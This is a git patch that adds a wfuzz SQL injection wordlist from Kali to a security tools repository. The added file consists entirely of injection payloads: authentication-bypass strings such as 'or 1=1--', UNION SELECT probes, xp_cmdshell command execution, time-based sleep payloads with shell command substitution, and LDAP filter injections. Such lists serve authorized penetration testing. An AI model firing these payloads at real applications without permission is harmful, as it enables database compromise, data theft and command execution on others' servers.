From c185e5eba13b89841ba20ec0fd5c43ce2d24f84b Mon Sep 17 00:00:00 2001 From: Malfurious Date: Tue, 26 Oct 2021 03:14:58 -0400 Subject: Add additional wordlists from Kali Signed-off-by: Malfurious --- wordlists/wfuzz/Injections/SQL.txt | 125 +++++++++++++++++++++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 wordlists/wfuzz/Injections/SQL.txt (limited to 'wordlists/wfuzz/Injections/SQL.txt') diff --git a/wordlists/wfuzz/Injections/SQL.txt b/wordlists/wfuzz/Injections/SQL.txt new file mode 100644 index 0000000..5ab2ef9 --- /dev/null +++ b/wordlists/wfuzz/Injections/SQL.txt @@ -0,0 +1,125 @@ +' +" +# +- +-- +'%20-- +--'; +'%20; +=%20' +=%20; +=%20-- +\x23 +\x27 +\x3D%20\x3B' +\x3D%20\x27 +\x27\x4F\x52 SELECT * +\x27\x6F\x72 SELECT * +'or%20select * +admin'-- +<>"'%;)(&+ +'%20or%20''=' +'%20or%20'x'='x +"%20or%20"x"="x +')%20or%20('x'='x +0 or 1=1 +' or 0=0 -- +" or 0=0 -- +or 0=0 -- +' or 0=0 # +" or 0=0 # +or 0=0 # +' or 1=1-- +" or 1=1-- +' or '1'='1'-- +"' or 1 --'" +or 1=1-- +or%201=1 +or%201=1 -- +' or 1=1 or ''=' +" or 1=1 or ""=" +' or a=a-- +" or "a"="a +') or ('a'='a +") or ("a"="a +hi" or "a"="a +hi" or 1=1 -- +hi' or 1=1 -- +hi' or 'a'='a +hi') or ('a'='a +hi") or ("a"="a +'hi' or 'x'='x'; +@variable +,@variable +PRINT +PRINT @@variable +select +insert +as +or +procedure +limit +order by +asc +desc +delete +update +distinct +having +truncate +replace +like +handler +bfilename +' or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +exec xp +exec sp +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +\x27UNION SELECT +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +to_timestamp_tz +tz_offset +<>"'%;)(&+ +'%20or%201=1 +%27%20or%201=1 +%20$(sleep%2050) +%20'sleep%2050' +char%4039%41%2b%40SELECT +'%20OR +'sqlattempt1 +(sqlattempt2) +| +%7C +*| +%2A%7C +*(|(mail=*)) +%2A%28%7C%28mail%3D%2A%29%29 +*(|(objectclass=*)) +%2A%28%7C%28objectclass%3D%2A%29%29 +( +%28 +) +%29 +& +%26 +! +%21 +' or 1=1 or ''=' +' or ''=' +x' or 1=1 or 'x'='y +/ +// +//* +*/* -- cgit v1.2.3